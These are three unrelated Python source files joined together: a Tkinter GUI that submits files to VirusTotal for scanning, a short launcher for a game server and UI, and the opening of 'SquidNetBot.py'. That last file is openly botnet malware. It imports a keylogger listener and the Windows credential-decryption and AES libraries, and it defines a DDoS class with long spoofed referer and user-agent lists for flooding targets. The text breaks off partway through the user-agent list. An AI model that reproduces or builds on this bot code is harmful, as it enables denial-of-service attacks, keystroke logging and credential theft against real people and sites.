self.Waiting_list_frame,
yscrollcommand=Waiting_list_scrollbar_Y.set,
xscrollcommand=Waiting_list_scrollbar_X.set,
)
self.Waiting_list.pack(side=LEFT)
Waiting_list_scrollbar_Y.config(command=self.Waiting_list.yview)
Waiting_list_scrollbar_X.config(command=self.Waiting_list.xview)
# ====================== second panelwindow ======================
self.second_panelwindow = PanedWindow(
self.main_widows, orient=HORIZONTAL, width=self.main_widows.winfo_width()
)
self.second_panelwindow.pack(fill=X)
# ====================== NOK list ======================
self.Nok_list_panedwindow = PanedWindow(
self.second_panelwindow, height=150, width=100, background="ivory"
)
self.Nok_list_panedwindow.grid_propagate(False)
self.Nok_list_panedwindow.propagate(False)
self.Nok_list_panedwindow.pack(side=LEFT, padx=5, pady=5)
Label(
self.Nok_list_panedwindow, text="File(s) unclean", background="ivory"
).pack(fill=X)
self.Nok_list_frame = Frame(self.Nok_list_panedwindow, background="ivory")
self.Nok_list_frame.pack(fill=X, padx=5, pady=5)
Nok_list_scrollbar_X = Scrollbar(self.Nok_list_frame, orient=HORIZONTAL)
Nok_list_scrollbar_X.pack(side=TOP, fill=X)
Nok_list_scrollbar_Y = Scrollbar(self.Nok_list_frame, orient=VERTICAL)
Nok_list_scrollbar_Y.pack(side=RIGHT, fill=Y)
self.Nok_list = Listbox(
self.Nok_list_frame,
yscrollcommand=Nok_list_scrollbar_Y.set,
xscrollcommand=Nok_list_scrollbar_X.set,
)
self.Nok_list.pack(side=LEFT)
Nok_list_scrollbar_Y.config(command=self.Nok_list.yview)
Nok_list_scrollbar_X.config(command=self.Nok_list.xview)
# ====================== button ======================
self.button_panedwindow = PanedWindow(
self.second_panelwindow, height=100, width=100
)
self.button_panedwindow.grid_propagate(False)
self.button_panedwindow.propagate(False)
self.button_panedwindow.pack(side=LEFT, padx=5, pady=5)
self.bouton_scan_file = Button(
self.button_panedwindow, text="Select files", command=self.select_scan_file
)
self.bouton_scan_file.grid(row=0, column=0, padx=5, pady=5)
self.bouton_scan_dir = Button(
self.button_panedwindow,
text="Select directory",
command=self.select_scan_dir,
)
self.bouton_scan_dir.grid(row=0, column=1, padx=5, pady=5)
self.bouton_delete = Button(
self.button_panedwindow, text="Delete", command=self.remove_to_waiting_list
)
self.bouton_delete.grid(row=0, column=2, padx=5, pady=5)
self.bouton_start_scan = Button(
self.button_panedwindow, text="Start scan", command=self.start_scan
)
self.bouton_start_scan.grid(row=1, column=0, padx=5, pady=5)
self.bouton_stop_scan = Button(
self.button_panedwindow,
text="Stop scan",
command=self.stop_scan,
state=DISABLED,
)
self.bouton_stop_scan.grid(row=1, column=1, padx=5, pady=5)
self.bouton_check_force_scan = Checkbutton(
self.button_panedwindow, text="Force Scan", command=self.set_force_scan
)
self.bouton_check_force_scan.grid(row=1, column=2, padx=5, pady=5)
self.curent_scan_file_label = Label(self.button_panedwindow, text="")
self.curent_scan_file_label.grid(row=3, column=0, columnspan=4, padx=5, pady=5)
# ====================== init end ======================
self.init_end = True
# start thread
self.start()
self.main_widows.mainloop()
def run(self):
"""
Thread run function
"""
while self.THREAD_IS_ACTIVE:
sleep(0.5)
if self.call_start_scan:
try:
self.bouton_scan_file.config(state=DISABLED)
self.bouton_scan_dir.config(state=DISABLED)
self.bouton_start_scan.config(state=DISABLED)
self.bouton_stop_scan.config(state=NORMAL)
# while not self.scan_stopped:
# if len(self.Waiting_file_list) != 0:
self.scan_file()
self.bouton_stop_scan.config(state=DISABLED)
self.bouton_start_scan.config(state=NORMAL)
self.bouton_scan_file.config(state=NORMAL)
self.bouton_scan_dir.config(state=NORMAL)
except Exception:
pass
self.thread_down = True
def show_error_log(self):
"""
Show error log in a new window
"""
error_log_windows = Toplevel(self.main_widows)
error_log_windows.title("VIRUSTOTAL SCAN : ERROR log")
error_log_windows.minsize(600, 480)
error_log_windows.geometry("600x500")
error_log_windows.iconbitmap(".\\img\\vt_logo.ico")
error_log_scrollbar_X = Scrollbar(error_log_windows, orient=HORIZONTAL)
error_log_scrollbar_X.pack(side=TOP, fill=X)
error_log_scrollbar_Y = Scrollbar(error_log_windows, orient=VERTICAL)
error_log_scrollbar_Y.pack(side=RIGHT, fill=Y)
error_log_listbox = Listbox(
error_log_windows,
yscrollcommand=error_log_scrollbar_Y.set,
xscrollcommand=error_log_scrollbar_X.set,
)
error_log_listbox.pack(fill=BOTH, padx=5, pady=5)
error_log_scrollbar_Y.config(command=error_log_listbox.yview)
error_log_scrollbar_X.config(command=error_log_listbox.xview)
for index, error_log in enumerate(self.error_log_list):
error_log_listbox.insert(index, error_log)
def show_help(self):
"""
Show Help in a new window
"""
help_windows = Toplevel(self.main_widows)
help_windows.title("VIRUSTOTAL SCAN : HELP")
help_windows.minsize(600, 480)
help_windows.geometry("600x500")
help_windows.iconbitmap(".\\img\\vt_logo.ico")
help_scrollbar_X = Scrollbar(help_windows, orient=HORIZONTAL)
help_scrollbar_X.pack(side=TOP, fill=X)
help_scrollbar_Y = Scrollbar(help_windows, orient=VERTICAL)
help_scrollbar_Y.pack(side=RIGHT, fill=Y)
help_listbox = Listbox(
help_windows,
yscrollcommand=help_scrollbar_Y.set,
xscrollcommand=help_scrollbar_X.set,
)
help_listbox.pack(fill=BOTH, padx=5, pady=5)
help_scrollbar_Y.config(command=help_listbox.yview)
help_scrollbar_X.config(command=help_listbox.xview)
for index, help in enumerate(about_text.split("\n")):
help_listbox.insert(index, help)
def show_nok_result(self):
"""
Show the NOK scan results in a new window
"""
Nok_result_windows = Toplevel(self.main_widows)
Nok_result_windows.title("VIRUSTOTAL SCAN : Nok Result")
Nok_result_windows.minsize(600, 480)
Nok_result_windows.geometry("600x500")
Nok_result_windows.iconbitmap(".\\img\\vt_logo.ico")
Nok_file_cbb = Combobox(
Nok_result_windows, state="readonly", values=self.NOK_file_list
)
Nok_file_cbb.pack(fill=X, padx=5, pady=5)
display = Label(Nok_result_windows, text="")
display.pack(fill=X, padx=5, pady=5)
Nok_file_cbb.bind(
"<<ComboboxSelected>>",
lambda event: self.update_nok_result_info(event, Nok_file_cbb, display),
)
def update_nok_result_info(self, event, combobox, label):
"""
Update the NOK result label when a new value is selected in the combobox
"""
label_text = ""
if combobox.current() != -1:
json_recev = self.Nok_file_list_scan_result_dict[
self.NOK_file_list[combobox.current()]
]
for analys_engine in json_recev:
if str(json_recev[str(analys_engine)]["detected"]) == "True":
print(
analys_engine, " : ", json_recev[str(analys_engine)]["result"]
)
label_text += (
str(analys_engine)
+ " : "
+ str(json_recev[str(analys_engine)]["result"])
+ "\n"
)
label.config(text=label_text)
combobox.selection_clear()
def set_force_scan(self):
"""
Toggle the force_scan flag
"""
self.force_scan = not self.force_scan
def clear_list(self):
"""
Clear all file lists and refresh the Listboxes
"""
self.NOK_file_list.clear()
self.OK_file_list.clear()
self.Waiting_file_list.clear()
self.update_Nok_list(self.NOK_file_list)
self.update_ok_list(self.OK_file_list)
self.update_waiting_list(self.Waiting_file_list)
def import_waiting_list(self):
"""
Import a saved list of files to scan
"""
filename = askopenfilename(
title="Ouvrir le(s) fichier(s) pour le scan", filetypes=[("save", ".pkl")]
)
if filename != "":
try:
with open(filename, "rb") as save_file:
self.Waiting_file_list = pickle.load(save_file)
self.update_waiting_list(self.Waiting_file_list)
except Exception as ex:
print(ex)
def export_waiting_list(self):
"""
Export the list of files to scan
"""
filename = asksaveasfilename(
title="save as ...", defaultextension="*.pkl", filetypes=[("save", "*.pkl")]
)
if filename != "":
try:
with open(filename, "wb") as save_file:
pickle.dump(self.Waiting_file_list, save_file, 0)
except Exception as ex:
print(ex)
def resize_windows(self, event):
"""
Dynamically resize Frame, panedwindows width depend on main windows width
Parameters
----------
event : tkinter.event
"""
if self.init_end:
new_width = (event.width / 2) - 10
padx = 10
Scrollbarsize = 50
self.ok_list_panedwindow.config(width=new_width)
self.ok_list.config(width=int((new_width - padx) - Scrollbarsize))
self.Waiting_list_panedwindow.config(width=new_width)
self.Waiting_list.config(width=int((new_width - padx) - Scrollbarsize))
self.Nok_list_panedwindow.config(width=new_width)
self.Nok_list.config(width=int((new_width - padx) - Scrollbarsize))
self.button_panedwindow.config(width=new_width)
def update_waiting_list(self, files_list_name):
"""
Clear and update waiting_list Listbox
Parameters
----------
files_list_name : list(str)
list of file paths (e.g. c:/example.py)
"""
self.Waiting_list.delete(0, self.Waiting_list.size())
for index, file in enumerate(files_list_name):
self.Waiting_list.insert(index, file)
def update_ok_list(self, files_list_name):
"""
Clear and update ok_list Listbox
Parameters
----------
files_list_name : list(str)
list of file paths (e.g. c:/example.py)
"""
self.ok_list.delete(0, self.ok_list.size())
for index, file in enumerate(files_list_name):
self.ok_list.insert(index, file)
def update_Nok_list(self, files_list_name):
"""
Clear and update Nok_list Listbox
Parameters
----------
files_list_name : list(str)
list of file paths (e.g. c:/example.py)
"""
self.Nok_list.delete(0, self.Nok_list.size())
for index, file in enumerate(files_list_name):
self.Nok_list.insert(index, file)
def get_all_file_in_directory(self, directory_address):
"""
Get a list of all files in the directory.
This function is recursive, so be careful with it (avoid symlinked files/directories).
Parameters
----------
directory_address : str
Directory name ( c:/...)
"""
list_of_file = list("")
for file_name in listdir(directory_address):
dir_file = directory_address + "/" + file_name
if isfile(dir_file):
list_of_file.append(dir_file)
else:
list_of_file += self.get_all_file_in_directory(dir_file)
return list_of_file
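# A non-recursive alternative sketch using the standard library (os.walk does
# not follow directory symlinks unless followlinks=True); kept as a comment to
# preserve the original behavior:
#   from os import walk
#   list_of_file = [root + "/" + name for root, _, names in walk(directory_address) for name in names]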
def close_app(self):
"""
"Properly" close application and stop thread
"""
_ = threading.Thread(name="stop_scan_thread", target=self.close_app_thread)
_.start()
def close_app_thread(self):
if self.call_start_scan:
self.call_start_scan = False
self.scan_stopped = False
self.bouton_stop_scan.config(state=DISABLED)
self.bouton_start_scan.config(state=DISABLED)
self.bouton_scan_file.config(state=DISABLED)
self.bouton_scan_dir.config(state=DISABLED)
self.bouton_delete.config(state=DISABLED)
while not self.scan_stopped:
self.curent_scan_file_label.config(text="Stopping scan")
sleep(0.5)
self.curent_scan_file_label.config(text="Stopping scan ...")
sleep(0.5)
self.curent_scan_file_label.config(text="")
self.THREAD_IS_ACTIVE = False
while not self.thread_down:
sleep(0.2)
self.main_widows.quit()
def select_scan_dir(self):
"""
Ask for a directory and add all files in it to the Waiting_file_list variable
"""
directory = askdirectory(title="Ouvrir le dossier a scaner")
if directory != "":
self.Waiting_file_list += self.get_all_file_in_directory(directory)
self.update_waiting_list(self.Waiting_file_list)
def select_scan_file(self):
"""
Ask for file(s) and add them to the Waiting_file_list variable
"""
filename = askopenfilenames(
title="Ouvrir le(s) fichier(s) pour le scan",
filetypes=[("all files", ".*")],
)
if filename != "":
self.Waiting_file_list += filename
self.update_waiting_list(self.Waiting_file_list)
def remove_to_waiting_list(self):
"""
Remove a file from the list of waiting files
"""
try:
file_to_remove = self.Waiting_list.selection_get()
if file_to_remove is not None:
self.Waiting_file_list.remove(file_to_remove)
self.update_waiting_list(self.Waiting_file_list)
except Exception as ex:
print(ex)
def stop_scan(self):
"""
Properly stop scan
"""
_ = threading.Thread(name="stop_scan_thread", target=self.stop_scan_thread)
_.start()
def stop_scan_thread(self):
"""
Properly stop scan
"""
if self.call_start_scan:
self.call_start_scan = False
self.bouton_stop_scan.config(state=DISABLED)
self.scan_stopped = False
while not self.scan_stopped:
self.curent_scan_file_label.config(text="Stopping scan")
sleep(0.5)
self.curent_scan_file_label.config(text="Stopping scan ...")
sleep(0.5)
self.curent_scan_file_label.config(text="")
self.bouton_start_scan.config(state=NORMAL)
self.bouton_scan_file.config(state=NORMAL)
self.bouton_scan_dir.config(state=NORMAL)
def start_scan(self):
"""
Start scan function.
"""
if len(self.Waiting_file_list) != 0:
if not self.call_start_scan:
self.call_start_scan = True
self.scan_stopped = False
def scan_file(self):
"""
Send all files in Waiting_file_list for analysis and move each one to the correct list (OK or NOK list)
INFORMATION
-----------
file_report_list[0] is the new scan, [1] the old scan (if the file was already scanned by you or someone else)
status code 200 = no problem, see https://developers.virustotal.com/reference#public-vs-private-api
The file size limit is 32MB; to submit files up to 200MB in size you must request a special
upload URL using the /file/scan/upload_url endpoint
MAX_FILE_SIZE = 32 MB
"""
try:
nok_file_json_result = dict()
MAX_FILE_SIZE = 31000000
for file in self.Waiting_file_list:
if not self.call_start_scan:
raise virustotal_exception.stop_scan_call()
self.curent_scan_file_label.config(text="Scan file : " + file)
if getsize(file) > MAX_FILE_SIZE:
self.Waiting_file_list.remove(file)
self.update_waiting_list(self.Waiting_file_list)
print("===================================")
print("file :", file, " ; size > 32MB")
self.error_log_list.append("file :\n")
self.error_log_list.append(file)
self.error_log_list.append("\nOver limit size (file size > 32MB)")
self.error_log_list.append(
"\n============================================\n"
)
else:
scan_file_needed = True
check_report_loop = True
file_positive = 0
# get sha256
scan_sha256 = ""
with open(file, "rb") as file_test:
hash_sha_256 = sha256()
hash_sha_256.update(file_test.read())
scan_sha256 = str(hash_sha_256.hexdigest())
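# note: the whole file is read into memory to hash it; acceptable here
# since anything larger than MAX_FILE_SIZE (~31 MB) was filtered out above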
if self.force_scan:
check_report_loop = False
scan_file_needed = True
else:
check_report_loop = True
# check report
while check_report_loop:
if not self.call_start_scan:
raise virustotal_exception.stop_scan_call()
file_report = vtotal.file_report([scan_sha256])
if file_report["status_code"] == 200:
try:
scan_date = file_report["json_resp"]["scan_date"]
scan_date_years = int(scan_date.split("-")[0])
scan_date_month = int(scan_date.split("-")[1])
scan_date_day = int(
scan_date.split("-")[2].split(" ")[0]
)
scan_date = datetime.datetime(
year=scan_date_years,
month=scan_date_month,
day=scan_date_day,
)
if (
datetime.datetime.now() - scan_date
) < datetime.timedelta(days=14):
file_positive += file_report["json_resp"][
"positives"
]
scan_file_needed = False
if file_report["json_resp"]["positives"] != 0:
nok_file_json_result = file_report["json_resp"][
"scans"
]
else:
scan_file_needed = True
except KeyError as ker:
print("file", file, "never scan")
print(ker, "not found")
scan_file_needed = True
check_report_loop = False
elif file_report["status_code"] == 204:
# https://developers.virustotal.com/reference#public-vs-private-api
print("Request rate limit exceeded")
print("File :", file)
sleep(10)
else:
print("===================================")
print("ERROR on file :")
print(file)
print("JSON received :")
print(file_report)
self.error_log_list.append("ERROR on file :\n")
self.error_log_list.append(file)
self.error_log_list.append("\nJSON received :\n")
self.error_log_list.append(file_report)
self.error_log_list.append(
"\n============================================\n"
)
sleep(1)
sleep(1)
# scan file
if scan_file_needed:
json_resp_loop = True
while json_resp_loop:
file_request = vtotal.file_scan(file)
if file_request["status_code"] == 200:
file_info = file_request["json_resp"]
scan_id = str(file_info["scan_id"])
scan_sha256 = str(file_info["sha256"])
sleep(5)
file_report = vtotal.file_report([scan_id, scan_sha256])
json_resp = file_report["json_resp"]
if str(json_resp[0]["response_code"]) != "-2":
file_positive += file_report["json_resp"][0][
"positives"
]
else:
while str(json_resp[0]["response_code"]) == "-2":
sleep(5)
file_report = vtotal.file_report(
[scan_id, scan_sha256]
)
if file_report["status_code"] == 200:
json_resp = file_report["json_resp"]
file_positive += file_report["json_resp"][0][
"positives"
]
if file_report["json_resp"]["positives"] != 0:
nok_file_json_result = file_report["json_resp"][
"scans"
]
json_resp_loop = False
else:
print("===================================")
print("NOK file :")
print(file)
print("JSON received :")
print(file_report)
self.error_log_list.append("NOK file :\n")
self.error_log_list.append(file)
self.error_log_list.append("\nJSON received :\n")
self.error_log_list.append(file_report)
self.error_log_list.append(
"\n============================================\n"
)
sleep(2)
self.Waiting_file_list.remove(file)
self.update_waiting_list(self.Waiting_file_list)
if file_positive == 0:
self.OK_file_list.append(file)
self.update_ok_list(self.OK_file_list)
else:
self.NOK_file_list.append(file)
self.update_Nok_list(self.NOK_file_list)
self.Nok_file_list_scan_result_dict[file] = nok_file_json_result
self.curent_scan_file_label.config(text="")
if len(self.Waiting_file_list) != 0:
self.scan_file()
self.call_start_scan = False
self.scan_stopped = True
except virustotal_exception.stop_scan_call:
print("stop scan called")
self.scan_stopped = True
self.call_start_scan = False
except Exception as ex:
print(ex)
raise ex
|
main.py
|
import asyncio
import sys
import threading
from monkey_patched.game import Game
# Init components
game = Game()
def start_server(loop):
from backend.server import main
threading.Thread(target=main, args=(loop,)).start()
def test_server(loop, rand_sleep=False):
from api_tester import ApiTester
threading.Thread(target=ApiTester(loop, rand_sleep=rand_sleep).start_test).start()
def run_ui():
from board_drawing import BDManager
BDManager()
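# Note: BDManager presumably runs the UI loop on the main thread, while the
# server (and the optional API tester) run in background threads started above.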
if __name__ == '__main__':
_loop = asyncio.get_event_loop()
start_server(_loop)
if len(sys.argv) > 1 and sys.argv[1] == 'test':
test_server(_loop, rand_sleep=False)
run_ui()
|
SquidNetBot.py
|
#-----SquidNet-Bot-Script-----#
import socket, time, os, threading, urllib.request, shutil, sys, random, base64, sqlite3, json, subprocess, re, ctypes
from datetime import datetime, timedelta
try:
from pynput.keyboard import Listener # pip install pynput
except ImportError:
pass
try:
import win32crypt # pip install pypiwin32
except ImportError:
pass
try:
from cryptography.fernet import Fernet # pip install cryptography
except ImportError:
pass
try:
from Crypto.Cipher import AES # pip install pycryptodome
except ImportError:
pass
class DDoS:
def __init__(self, ip, delay):
self.ip = ip
self.delay = delay
self.stopatk = False
self.useragents = self.obtain_user_agents()
self.referers = self.obtain_referers()
self.threader = threading.Thread(target=self.start_thr)
self.threader.start()
def obtain_referers(self):
referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=query?=query=..',
'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
'http://yandex.ru/yandsearch?text=',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
'/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=',
'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=',
'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=']
return referers
def obtain_user_agents(self):
user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4',
'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
